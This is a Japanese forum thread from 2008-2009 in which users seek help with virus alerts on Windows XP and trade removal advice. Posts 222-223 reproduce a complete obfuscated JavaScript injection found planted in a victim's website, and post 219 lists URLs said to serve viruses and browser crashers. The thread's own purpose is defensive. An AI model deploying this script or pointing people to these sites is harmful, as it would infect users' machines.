08/12/10 07:57:26
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「最新」
先ほど自動更新でアップデートしたら
悪意のあるソフトウェアの削除ツールで、
TrojanDropper:Win32/Renos.N
なるものが削除されました。
ぐぐても、どんなウィルスなのかいまいちわかりません
これはどんなウィルスなんですか?
よろしくお願いします。
201:名無しさん@お腹いっぱい。
08/12/10 12:27:32
3.0mod3-3.54-setup.exe
a0030828.exe
バスター2009でこの二つがウイルスだって出た
3.0mod3-3.54-setup.exeがWINMXのパッチなのは分かったけど
a0030828.exeが何なのかわからん?
誰か教えてくれ
202:名無しさん@お腹いっぱい。
08/12/10 13:07:15
>>199
sens.dllでググれ
203:名無しさん@お腹いっぱい。
08/12/10 13:46:11
>>201
パスがSystem Volume Information以下だったら、システムの復元のバックアップファイル。
>>200
Renosでググれ。
>>199
誤検出でなければ、sens.dllが改変されてる。
セキュリティソフトで修復出来なかったら、早くリカバリした方がいいよ。
204:名無しさん@お腹いっぱい。
08/12/10 14:40:26
研究でウィルスの検体が大量に欲しいのですが、どこかにzipファイルなどでウイルスをゲットできるサイトありませんか?
205:名無しさん@お腹いっぱい。
08/12/10 17:39:18
>>204
それくらい自分で探そうね。
206:名無しさん@お腹いっぱい。
08/12/10 23:28:56
困っています。下記がバスターコーポレーションで検出
dmserv.dll
C:\WINDOWS\system32\の中で
隔離削除できないため困っています。
セーフモードでもだめでした、何かOS入れ直さないで
修復できる方法ありませんか?
207: ◆N9P3SuvBPo
08/12/11 00:06:51
>206
案内レス
企業用PCでしょうか?
もしそうならシステム管理者にご報告を
208:名無しさん@お腹いっぱい。
08/12/11 07:06:04
ウイルスリムーバーをこらしめたいが
209:名無しさん@お腹いっぱい。
08/12/11 07:51:56
>167 さん
聞こえなくなくったからと言って安心できませんよ。僕も12/4日くらいに取りつかれ、英語交じりの中国語のラジオ放送みたいなのと、クリック音が連続して聞こえる現象がありましたが、断続的で3日ほ現象が無かったのです。どうも夜8時頃に起動すればそうした現象が
出て、他の時間帯ではそうではなありませんでした。Flash getは直ちに削除しましたが、新しすぎるためなのかウィルスセキュリティでは検出できず、いろいろな体験版で対処中です。
210:名無しさん@お腹いっぱい。
08/12/12 19:45:24
>>203
THX
System Volume Informationだから
システムの復元のバックアップファイルなのか?
なんでウイルス扱いなんだ?
隔離してるって出てるけどどうなるんだろう?
更新でソフトを新しく入れるとこんなのばっかり・・・
211:名無しさん@お腹いっぱい。
08/12/13 01:05:56
いまエクスプローラで作業しているのだが
s2.com
ってウィルスかな? ドライブ全てにいるのだが、前からあったかな…
ググッテモよく分からないし…ソース頼む
212:名無しさん@お腹いっぱい。
08/12/13 06:11:09
amvoをうつされたので下のサイトの通りに削除。
その後DドライブにRECYCLERとSystem Volume Informationが出てきたんだけど、これって何で?
今までは「全てのフォルダを表示する」にしてても表示されなかったのに。
スレリンク(sec板)l50
213:名無しさん@お腹いっぱい。
08/12/13 06:13:26
↑winXPSP3です。すまそ。
214:名無しさん@お腹いっぱい。
08/12/13 10:20:04
>>206
OSがファイルをつかんでしまっているためだと思います。
マイコンピュータ右クリック→管理→サービスとアプリケーション
→サービス
サービスの中に怪しい文字列(意味のない文字列)があったら
それをダブルクリック、スタートアップの種類を「無効」にして一度パソコンを再起動、
それからもう一度system32フォルダをコーポレートエディションでスキャン、
これでうちの会社はできましたよ。
一度やってみてください。
215:名無しさん@お腹いっぱい。
08/12/13 10:21:31
システムの復元については機能をとりあえずOFFにするといいと思います。
OSの復元はできませんが最悪再セットアップすればいい話なので。
216:名無しさん@お腹いっぱい。
08/12/13 21:34:35
自分のパソコンがどれだけ防御力が高いかためしたい。
ためしにウイルスに感染できるホームページとかないですか?
当然バックアップしてから挑みます。
自分の防御力を調べてみたいって人少ないのかなあ。
217:名無しさん@お腹いっぱい。
08/12/13 22:04:21
>>216
URLリンク(jp.youtube.com)
まだあるかわかんないけど。
リンクはようつべ
218:名無しさん@お腹いっぱい。
08/12/13 22:28:37
>>217 もっとちょうだい
gog いってみたけど今は配布してないようです。
219:名無しさん@お腹いっぱい。
08/12/13 22:57:54
【激しく既出、危険なサイト一覧=ウイルス、ブラクラ系】
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
3. //easyweb.easynet.co.uk/~hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.kogalu.com/sou/girls/index2.htm (通常はエロサイトだがブラクラ&ウイルスの場合あり)
7. //raus.de/crashme/ (ブラクラ&ウイルス)
8. //www.albinoblacksheep.com/flash/you.html (ブラクラ:Windowオープン/ゾンビ ウィンドウ/無限JavaScriptループ)
9. //www.albinoblacksheep.com/flash/open.html (8と同じです)
10. //www.youareanidiot.org/ (8と同じです)
11. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)
220:名無しさん@お腹いっぱい。
08/12/13 23:36:03
>>219 全部行ってみたんですが
みんなウイルスの挙動紹介の安全なHPですね。
221:名無しさん@お腹いっぱい。
08/12/14 01:19:47
スレチなら誘導お願いします。
サイト持ちなんですが、ファイル上げてから暫くするとソースに
よくわからない記述が追加されてしまいます。
サイト感染してるんじゃないですかって、閲覧者からの報告があって
調べてみたら見つけました。
とりあえずローカルファイルには問題ないっぽいので、
サーバーのファイルを全て消去して上げなおしました。
昨日上げなおしてソースチェックしたらなかったので安心してたら、
今日ソース見たときには追加されてました。
今、また上げなおして様子見中なんですが、
また追加されたらどう対処するべきかわかりません。
アドバイスお願いします。
↓がその記述です。
222:名無しさん@お腹いっぱい。
08/12/14 01:22:42
<script>function c102916999516m49435c6be9d24(m49435c6bea4f4)
{ function m49435c6beacc4(){var m49435c6beb495=16;return m49435c6beb495;}
return (parseInt(m49435c6bea4f4,m49435c6beacc4()));}
function m49435c6bebc69(m49435c6bec437){ function m49435c6bedba9(){return 2;}
var m49435c6becc07='';m49435c6beeb49=String.fromCharCode;
for(m49435c6bed3d8=0;m49435c6bed3d8<m49435c6bec437.length;m49435c6bed3d8+=m49435c6bedba9())
{ m49435c6becc07+=(m49435c6beeb49(c102916999516m49435c6be9d24(m49435c6bec437.substr(m49435c6bed3d8,m49435c6bedba9()))));}return m49435c6becc07;}
223:名無しさん@お腹いっぱい。
08/12/14 01:23:42
var zc6='';var
m49435c6bef31b='3C7'+zc6+'3637'+zc6+'2697'+zc6+'07'+zc6+'43E6
96628216D7'+zc6+'96961297'+zc6+'B646F637'+zc6+'56D656E7'+zc6+
'42E7'+zc6+'7'+zc6+'7'+zc6+'2697'+zc6+'465287'+zc6+'56E657'+z
c6+'363617'+zc6+'065282027'+zc6+'2533632536392536362537'+zc6+
'322536312536642536352532302536652536312536642536352533642536
332533312533302532302537'+zc6+'332537'+zc6+'32253633253364253
237'+zc6+'2536382537'+zc6+'342537'+zc6+'342537'+zc6+'30253361
253266253266253637'+zc6+'253666253637'+zc6+'25366625333225366
42536352532652536652536352537'+zc6+'34253266253265253637'+zc6
+'2536662532662536332536382536352536332536622532652536382537'
+zc6+'34253664253663253366253237'+zc6+'2532622534642536312537
'+zc6+'342536382532652537'+zc6+'322536662537'+zc6+'3525366525
36342532382534642536312537'+zc6+'342536382532652537'+zc6+'322
5363125366525363425366625366425323825323925326125333225333225
3334253332253337'+zc6+'253239253262253237'+zc6+'253332253337'
+zc6+'253237'+zc6+'2532302537'+zc6+'37'+zc6+'2536392536342537
'+zc6+'342536382533642533342533312532302536382536352536392536
37'+zc6+'2536382537'+zc6+'34253364253335253334253337'+zc6+'25
32302537'+zc6+'332537'+zc6+'342537'+zc6+'39253663253635253364
253237'+zc6+'2536342536392537'+zc6+'332537'+zc6+'302536632536
312537'+zc6+'39253361253230253665253666253665253635253237'+zc
6+'2533652533632532662536392536362537'+zc6+'32253631253664253
63525336527'+zc6+'29293B7'+zc6+'D7'+zc6+'6617'+zc6+'2206D7'+z
c6+'969613D7'+zc6+'47'+zc6+'27'+zc6+'5653B3C2F7'+zc6+'3637'+z
c6+'2697'+zc6+'07'+zc6+'43E';document.write(m49435c6bebc69
(m49435c6bef31b));</script>
224:名無しさん@お腹いっぱい。
08/12/14 04:57:20
>>221-223
貼り付けたコードの改行や不要部分を取り除いて、エディターでファイルにしてみたところ、
"JS/Obfuscated"と言う名称のトロイであることが判りましたよ。うちのMcAfee+Artemisが
検出しました。
以下のページで、"JS/Obfuscated"と言う名称で検索してみてください。ちなみにMcAfeeの
ページですが、日本語のサイトでは載っていません。USAの方で探せます。
URLリンク(vil.nai.com)
Virus Profile: JS/Obfuscated
Risk Assessment
- Home Users: Low
- Corporate Users: Low
Date Discovered: 11/26/2008
Date Added: 11/26/2008
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Script
詳細な説明が、"JS/Obfuscated.b"とかにしか有りませんが、ブラウザの脆弱性を利用する
スクリプトファイルですね。
あなたのPCが、マルウエアに感染していないのなら、サーバーがSQLインジェクション等で
攻撃されてるんでしょうね。管理者へ至急連絡しないと行けませんね。
225:名無しさん@お腹いっぱい。
08/12/14 12:09:03
単純にIDとパスが漏れてる(推測しやすいとか、トロイ踏んだとか)とかね。
226:名無しさん@お腹いっぱい。
08/12/14 20:48:41
【使用OS】 「windowsXP」
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「セキュリティ24」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新済」
【スパイウェア対策ソフト】 「Kingsoft」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常時自動更新状態」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「uu.exe」
PCを起動するたびに一時ファイルのフォルダに複数のuu.exeに入っています
しかも対策ソフトも一時フォルダを開けないと反応せず削除しないみたい感じです
調べたところPCに別のウイルスが入っていてそれが勝手にダウンロードしているみたいです
どのような対策をすればよろしいのでしょうか?
227:221
08/12/15 03:26:54
>>224
トロイでしたか…。
PCが感染してる可能性は考えたので、ファイル上げなおす前に一通りのチェックはしました。
別のサーバーでやってるサイトは全く感染しないのでPCが問題という事はおそらくないと思ってます。
もう少しPCチェックしてやっぱり問題がないのなら管理者に連絡してみます。
>>225
感染ばっかり考えてて忘れてました。すぐ変更してみます。
ありがとうございました。
228: ◆N9P3SuvBPo
08/12/15 18:19:19
>227
健康診断のほうに移動されました?
ログに問題は無い様です…
それともしかしてMBAMというツールも使いました?
とりあえずあちらの方の指示を優先してください。
229:名無しさん@お腹いっぱい。
08/12/15 18:55:49
>>211
エクスプローラですべてのファイルとフォルダを表示(隠しファイルの表示)は出来てる?
出来るならc:\windows\system32フォルダにrevo.exeやrevo0.dllとか無いか確認してみて。
もし出来なかったらウイルスが実行されてる状態。
しかも各社ウイルス対策ソフトで全く対策されていないウイルス
230:221
08/12/15 20:19:42
>>228
しました。
MalwareBytes' Anti-Malwareでしたら使いました。
ログは問題なしですか。とりあえず一安心ですが感染原因が不明ですね…。
IDとパスが漏れてたのかもしれないです。
ありがとうございます。指示を待ちます。
231:名無しさん@お腹いっぱい。
08/12/15 20:45:22
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8.1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「手動」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\SYSTEM32\ils.dll」
avast! からの警告「疑わしいファイルが発見されました」
と表示されました。
削除していいのでしょうか?
232:名無しさん@お腹いっぱい。
08/12/15 20:54:04
>>231
URLリンク(detail.chiebukuro.yahoo.co.jp)
233:名無しさん@お腹いっぱい。
08/12/15 21:07:59
>>231
avast! Anti-Virus Part99
スレリンク(sec板:30-番)
234:名無しさん@お腹いっぱい。
08/12/15 21:17:42
別スレに書き込んだのですが今皆さん何か問題が起きてるようで
スルーされ気味なのでこちらに書き込ませてください
OS XP
ウィルスソフト avastとspybot
更新はどちらも最近放置してたかもしれません
問題 avastがルートキットを検出したので慌てて指示に従い
再起動後HDDの自動スキャンを開始しました
現在スキャン中で結果待ちですがルートキットは深刻な問題でしょうか?
対処についてはavastの指示に従っていればおkですか?
私のPCを救うアドバイスを戴けませんか
235:名無しさん@お腹いっぱい。
08/12/15 21:22:01
avastが検知した物はavastユーザにしかわかりませんので
avastスレにお帰りください
236:名無しさん@お腹いっぱい。
08/12/17 21:18:06
ウィルスが見つかりましたっていう警告が出たので
詳細を確認してみたんですが、そのウィルスの名前を
ウィルスバスターで検索してみたんですがヒットしなかったので
対処方法とかわからず放置しています
確かHTML_HEKIREみたいな名前でした。
誰かわかる人いませんか?
マジ不安です
237:名無しさん@お腹いっぱい。
08/12/17 21:30:47
>>236
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 !!!
238:名無しさん@お腹いっぱい。
08/12/17 21:34:56
バスタースレでどうぞ!
239:名無しさん@お腹いっぱい。
08/12/18 22:05:26
【使用OS】 「XP sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NTT西日本ウィルス対策」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
下記のメッセージが出て、インターネットの接続が切断されます。
処理の結果:ウィルス感染ファイルを隔離できませんでした。
このウィルスは手動で処理する必要があります。
ファイル名:C\WINDOWS\system32\HBmhly.dll
ウィルス/スパイウェア名:TSPYLOLYDA.AE
対策等教えて頂ければ幸いです。
宜しくお願いします。
240:名無しさん@お腹いっぱい。
08/12/18 22:50:01
>>239
NTT西日本ウィルス対策と言うのはバスターかな?NTTに聞くのがよいと思うが
ちなみに"TSPYLOLYDA.AE"というキーワードでは見つからないが、ファイルパス名から
調べると、トロイの木馬で、パスワードを盗むマルウエアだと思う。
削除できないのは、それが動作中だから。セーフーモードで起動して削除。
それでも駄目なら、セーフDOSモードで削除となるが、使ってるソフトで方法が異
なるので、NTTサポにまず聞くと良いぞ。
241:名無しさん@お腹いっぱい。
08/12/19 11:20:07
【使用OS】 「XP SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
スキャンの結果
ファイル名「windows\system32\sens.dll」
ウィルス名「W32/Patcher」
状態「再起動後にスキャン」
となりました。
「対応の必要はありません」とは表示されるのですが
隔離も削除させてくれないので、自動スキャンの度に毎回検出されるので気になります。
URLリンク(detail.chiebukuro.yahoo.co.jp)
↑のサイトを参照して「windows\system32\sens.dll」を他の健康なPCから持ってきたら解消されますでしょうか?
もしくは何か良い策がありましたらご教授願います。
242:名無しさん@お腹いっぱい。
08/12/19 12:43:31
>>241
スレリンク(sec板)
243:名無しさん@お腹いっぱい。
08/12/19 21:40:56
>>239
URLリンク(www.trendmicro.co.jp)
244:名無しさん@お腹いっぱい。
08/12/19 21:42:05
ネットにつながっていないPCのウィルスを除去したいのですが、なにかフリーでありませんでしょうか?
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 過去にネットにつながってたときは「Avast」 を使ってました。
Avastの期限が切れたあとに「トロイの木馬が発見されました!」と警告が出たことがあります。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 いない
【ルータの有無】 なし
245:名無しさん@お腹いっぱい。
08/12/19 23:30:43
>>244
URLリンク(drweb.jp)
インストール不要
246:名無しさん@お腹いっぱい。
08/12/20 05:46:34
>>241
システムの復元を無効にする
URLリンク(www.mcafee.com)
フルスキャンを実行する→問題解決後システムの復元をもどす
でokのはず
247:名無しさん@お腹いっぱい。
08/12/20 19:47:45
>>245
ありがとうございました。
248:241
08/12/21 01:08:37
>>244
ありがとうございます。
試してみます。
249:名無しさん@お腹いっぱい。
08/12/22 19:38:14
けっこうおもしろかった
URLリンク(www.interbars.co.jp)
250:名無しさん@お腹いっぱい。
08/12/22 21:14:38
>>249
rootkit駆除に関してとても参考になった。ブログ主は謙遜してるが相当なプロに感じる。
251:名無しさん@お腹いっぱい。
08/12/22 22:02:25
逆汗するならともかくツール2~3個拾うだけならプロとは言わんよ
252:名無しさん@お腹いっぱい。
08/12/22 22:27:34
>>250
同意
いかにrootkitがやっかいなモノかが分かる
253:名無しさん@お腹いっぱい。
08/12/22 23:32:30
a
254:名無しさん@お腹いっぱい。
08/12/22 23:46:21
本日カスペルスキーでスキャンしろと
全社員に通達がありました。
なぜですか?
255:名無しさん@お腹いっぱい。
08/12/23 00:03:57
そりゃ困った社員がウイルス付きPCをLANに繋いだからだろ
256:名無しさん@お腹いっぱい。
08/12/23 00:26:34
【使用OS】WinXP Home edition Version2002 Service Pack3
【Microsoft Update(MU)の状態】被害が出てからupdate
【ルータの有無】 有
【スキャンの結果何が検出されたか】
トロイの木馬(トロジャンなんたら)とスパイウィア
処理第1段階
おとといの夜8時頃からずっとシャットダウンの繰り返し。
カウントダウン→シャットダウン(DCOM Processer Luncherが異常でなんたら)
昨夜は途中、デスクトップにあるIEなどのボタンをダブルクリックしても反応せず。
ウイルスバスター無料版2009をダウンロードしたが、削除はしてくれない。
ありました、というだけのよう。
カスペをダウンロード。
ウィルスバスターの中にウィルスがあると教えてくれる。削除。
そしてネットに繋がらないようになる。
257:名無しさん@お腹いっぱい。
08/12/23 00:30:41
第2段階
もう一台のパソコンでググル。
ようやくSasserという言葉を知り、マイクロソフトのHPで対策。
対策途中、シャットダウンされると、ブラウザのヒストリーが真っ白になる。
なので、さっきのページをもう一度検索する。(お気に入りに登録)
URLリンク(www.microsoft.com)
ここを見て対策したらネットに繋がった。
regeditのレジストリキーは同じものがなかった。ここでUpdate。
悪意のあるソフトウェアの削除ツール (KB890830)をダウンロード。
URLリンク(www.microsoft.com)
一部が削除できないと言われる。
市販ソフトで対応するよう書かれてあったので、ウイルスバスターオンラインスキャンを行う。
スパイウェアが見つかり、削除完了。
再起動してみるが、またカウントダウンシャットダウンの繰り返し。
第3段階
ブラウザ、ネットに繋がったり繋がらなかったり。
ようやくこのスレに辿り着き、カウントダウンを止める。
>>9のF-Secure オンラインスキャナを試そうとすると、ダウンロード完了後、
再起動。(何度やっても。)
今、シーマンテックオンライン検索中。
スパイウェアってこんなに取れないものなんでしょうか。
258:名無しさん@お腹いっぱい。
08/12/23 00:39:23
削除したのに出ました。
Unix.Penguin に感染しています。
VBS.Freelink.B に感染しています。
Unix.Penguin に感染しています。
Macro.src に感染しています。
259: ◆N9P3SuvBPo
08/12/23 00:49:46
>252
俺なら回復コンソールから一掃する。
Rootkitですら回復コンソール上では起動しないから。
やっかいなモノ
>これには同意
>256-257
>ウイルスバスター無料版2009をダウンロードしたが
なるほど…
それまで対策ソフトは入れてなかったわけだな。
それに…
>【Microsoft Update(MU)の状態】被害が出てからupdate
感染後に慌ててしても後の祭り
俺はリカバリーを奨めます!
>258
それは2ch専ブラフォルダからの検出
問題なし
260:名無しさん@お腹いっぱい。
08/12/23 00:56:00
>>259
レスありがとうございます
なんでかファイアウォールが無効になってました
対策ソフトは入れてなかった
買おうかなと思ったけど、どれもこれも削除できないソフトなら
買うものがないなーと考え中
>それは2ch専ブラフォルダからの検出
結局見つけられなかったということですよね
とりあえず、今日もまた深夜まで食い込んだので寝ます
261:名無しさん@お腹いっぱい。
08/12/23 02:34:12
>>260
OS等を含むソフトウエア(ブラウザやフラッシュ、etc...)のアップデートは悪意から守るために、
事前に行っておく必要があり、セキュリティーソフトは悪意を防ぐために使う物で、被害を最小限に抑
えるためにも必要。
できの良い悪意のあるソフトは、一見してPCが異常であることが判らないものもある。今回のように
起動しないとか異常終了するなど、すぐに判るのはラッキーだと考えるべき。標準のFWを無効にする
など当たり前で、セキュリティーシステムを止めたり、自身の存在を検出できなくする物もある。
何も対策してないPCで、マルウエアが暴れたら手の施しようが無くなる。度々リカバリーしたくない
のなら、サポートの有る有償のセキュリティーソフトを使うことをお勧めする。
262:名無しさん@お腹いっぱい。
08/12/23 18:17:05
ADWBJC?なんたらのウイルスにより、インターネットアクセスできません。手動で削除してくれと書いてますが、どうすれば…わかる方いますか?
263:名無しさん@お腹いっぱい。
08/12/23 19:38:09
>>262
>>1
俺たちはエスパーではない
264:名無しさん@お腹いっぱい。
08/12/23 22:03:02
>>261
FWを無効にするものもあるんですか・・・
この機会に何か入れたいと思います
265:名無しさん@お腹いっぱい。
08/12/27 09:41:43
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
266:名無しさん@お腹いっぱい。
08/12/27 09:46:58
211 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/27(土) 09:14:13
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
267:名無しさん@お腹いっぱい。
08/12/27 20:22:58
すでに廃業しているコムスンの公式HPを閲覧すると
トロイの木馬を送り込まれるようです。
こんなサイト放置しているのは危険だと思うので
あえて挑戦できるPC環境の方は
確認して、所定の機関に通報してください。
【感染する疑いのあるサイト⇒】URLリンク(www.comsn.c) o m
268: ◆N9P3SuvBPo
08/12/27 20:58:13
>267
行って来た
真っ白なページ
んで、ソース見たら怪しげなコードが…
JavaScriptを切っていれば無害?
269:名無しさん@お腹いっぱい。
08/12/28 02:05:34
>>267
アグスによる調査結果(事業閉鎖の案内は確認できる)
URLリンク(www.aguse.jp)
該当HPソース内の<head>...%エスケープされた難読化ファイル...</head>
間のスクリプト調査結果。
URLリンク(www.virustotal.com)
検出された、トロイの木馬の説明(以下説明の新種と思われる)
URLリンク(www.f-secure.co.jp)
サーバホスティングサービス(株式会社NTTPCコミュニケーションズ)
技術サポートに報告しました。
virustotalの結果を見ると、新種のようで少数のベンダーしか検出出来ていないの
で踏むのは危険ですねぇ。マジ迷惑な会社ですね。消え去った後も悪意をばらまい
ている
270:名無しさん@お腹いっぱい。
08/12/28 04:12:07
デコードしてみたけど、何も無かった。
271:名無しさん@お腹いっぱい。
08/12/28 20:26:42
なんだなんだ。
272:名無しさん@お腹いっぱい。
08/12/30 00:22:18
>>269
>>270
ご対応ありがとうございます。
しかし宣伝するわけではないけどアンチウィルスソフト
(Win Live OneCare)が検出してくれて助かった。
273:名無しさん@お腹いっぱい。
08/12/30 02:42:46
【使用OS】 「XPホームエディション」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「カスペルスキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「?上記」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
現在の状況:興味でえっちなアングラサイトを見てしまったらトロイやらワームやらてんこ盛りで感染
カスペルスキーでスキャン駆除をする前に
Windows Security Centerがピコピコ光ってたのでなんだろうとクリック
Antivirus2009に誘導されインストールを安易に触ってしまったら
貴方のPcは242個の脅威に感染してますから課金してねというページが表示
カスペルスキーあるからそっちで駆除してもらったのですが
その後もセキュリティセンターの「242個の警告」と、Antivirusの課金ページが勝手に表示されます・・・
ゲームや作業しててもいきなり表示されてそのたびに中断されてしまう状態で
削除したくともソレに該当する項目も無く
アプリの追加削除にも該当ナシで困ってます。
274:名無しさん@お腹いっぱい。
08/12/30 03:01:20
>>273
スレリンク(sec板)
スレリンク(sec板)
275:名無しさん@お腹いっぱい。
08/12/30 22:05:09
【使用OS】 「XP Home sp2」
【Microsoft Update(MU)の状態】 「sp3への更新をしてない状態」
【使用セキュリティソフトとバージョン】 「avast4.8Home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ついさっき入れたばかり」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Win32:SysPatch[Wrm]」
昨日うっかりあやしいページを踏んで感染
その後起動するたびにavastがウイルス発見しますた!!といちいちアラートを出すのだが、
SYSTEM32内USER32.DLLに感染しているみたいで削除も修復もチェストもなんにもできない
ググってみてもそれらしい項目が出てこないしで困った
avastのことだから誤検出かと思ったんだが気味が悪い
276: ◆N9P3SuvBPo
08/12/30 23:38:23
>275
正規ファイルのc:\windows\system32\user32.dllに感染か?
さらに詳細を知りたいので、↓のサイトでこのc:\windows\system32\user32.dllをスキャンして
スクリーンショットを取って結果をうpろだに上げてください。
URLリンク(www.virustotal.com)
277:名無しさん@お腹いっぱい。
08/12/30 23:52:51
>>276
システム上重要なファイルなのか知らないが、
0 bytes size received / Se ha recibido un archivo vacio
と表示されるだけで他は何もでなかった
インストールして送るソフトも使ったが駄目だった
でもavastやらウイルスバスターでオンラインスキャンしたら、
相変わらず何の処理も選べなかったけど今は再起動しても何故かavastは騒がなくなったわ
278: ◆N9P3SuvBPo
08/12/30 23:59:17
>277
なんだったんだろうね?
もう一度c:\windows\system32\user32.dllのファイルサイズを教えてください。
279:名無しさん@お腹いっぱい。
08/12/31 00:05:40
>>278
サイズは
574,976 バイト
ディスク上のサイズは
574,536 バイト
ってなってました
280: ◆N9P3SuvBPo
08/12/31 00:21:34
>279
環境によるかもしれないけど俺は
サイズ=574,464バイト
ディスク上のサイズ=577,536バイトですね
作成日時は2005年12月22日、19:05:40
更新日が2005年3月3日、3:09:44ですね
常駐してる対策ソフトが検出しなくなったのなら、
たぶんもう大丈夫だろう。
281:名無しさん@お腹いっぱい。
08/12/31 01:23:42
>>280
安心していたのもつかの間、またavastが騒ぎ出しました
なんで修復できないのかなって思ってたら読み取りモードだったかららしい
とりあえずuser32.dllをコピーして別の場所へ移してから読み取りモードを外してさっきのURLを再チャレンジ
結果が長くてどこまでスクショとればわからなかったけど一応これで…
URLリンク(www.e-kuraberu.net)
282:名無しさん@お腹いっぱい。
08/12/31 01:34:58
あっ281のパス忘れてた 4109です
283: ◆N9P3SuvBPo
08/12/31 02:54:50
>281
複数のベンダーが検出してるとこ見ると、誤検出ではないですね。
正規ファイルの感染…どう対応しようか?
system32内にuser32.dllありますよね。
通常モードのまま(セーフモードなら一旦再起動して通常モードで立ち上げる)
名前をuser32.bakにリネームしてください。
しばらく待っても、user32.dllが作成されないようなら
user32.bakをuser32.dllに戻してください。
284:名無しさん@お腹いっぱい。
08/12/31 05:30:32
URLリンク(dropfile.freehostia.com)
バーボンハウスって名前のブラクラ?サイトなんですが
ウィンドウが沢山開くわけでもなく、何をやってるのかよくわかりません
このサイトは何をしてくるのでしょうか?
285:名無しさん@お腹いっぱい。
08/12/31 05:59:57
>>284
完全にスレ違いだが
そこにアクセスすると何回も強制的にページを読み込まされる。
するとPCに負荷がかかるわけだが、自分の環境では特に被害は無い。
窓やタブを大量に開くだけがブラクラってわけじゃない
ブラクラって分かってるのなら安易に踏まないように。
286:名無しさん@お腹いっぱい。
08/12/31 06:08:01
スレ違いすいませんでした
よくわかりました、ありがとうございました
287:名無しさん@お腹いっぱい。
08/12/31 12:39:30
>>283
user32.dllをuser32.bakに変えたらちゃんとuser32.dllが作成されました
サイズを調べたら283さんと同じ574,464バイト、ディスク上が577,536バイトに戻っていました
作成されたdllをスキャンしても何も反応はなかったので恐らく正常な形になったんだと思います
その後再起動してみても何もuser32.dllの警告らしきものはでなかったので、先ほどリネームしたbakを削除しましたがこれで処理できたということでしょうか
288: ◆N9P3SuvBPo
08/12/31 13:11:14
>287
はい、OKです。(Windowsのシステム保護機能が効いたようです)
あとはAvastで全ドライブをスキャンして、何も検出されなければ解決です。
それと
>とりあえずuser32.dllをコピーして別の場所へ移してから
別の場所に移動したuser32.dllのコピーも削除してください。
289:名無しさん@お腹いっぱい。
09/01/04 23:19:56
テンプレ使用ご容赦下さい
キンタマや山田ウィルス等のウィルス対策として、プライベートなフォルダをEFSで暗号化すれば流出してもファイルを読み取られる事は無いのでしょうか?
290:名無しさん@お腹いっぱい。
09/01/04 23:43:39
キンタマ、山田ウイルスは板違い。
てかマルチ市ね。
291:名無しさん@お腹いっぱい。
09/01/05 02:19:26
>>289
>>92
292:名無しさん@お腹いっぱい。
09/01/07 00:21:16
【使用OS】 「WINDOWSXP」
【Microsoft Update(MU)の状態】 「何スかそれ・・」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「多分してます」
【スパイウェア対策ソフト】 「えぇ・・ウィルスバスターじゃだめスか・・?;」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「1週間に2回ほど」
【ルータの有無】 「不明」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「脅威名:Cookie DoubleClick」
「危険度:中」
「種類 :WebブラウザのCookie」
なんか正月明けくらいに18禁サイトまわったあとにウィルス検索したらこいつが出てきて
それから今日検索してみたらまたこいつが弾かれてました;
でも今日まで18禁サイトとか行ってないのになんでまた感染してるのか全くわかりません
何かに入っちゃってるんでしょうか?
対処策あったら教えてくださいm(__;)m
293:名無しさん@お腹いっぱい。
09/01/07 00:26:44
今また検索してみたらDoubleClickとAdvertisingとかいうのも増えちゃってますが・・・
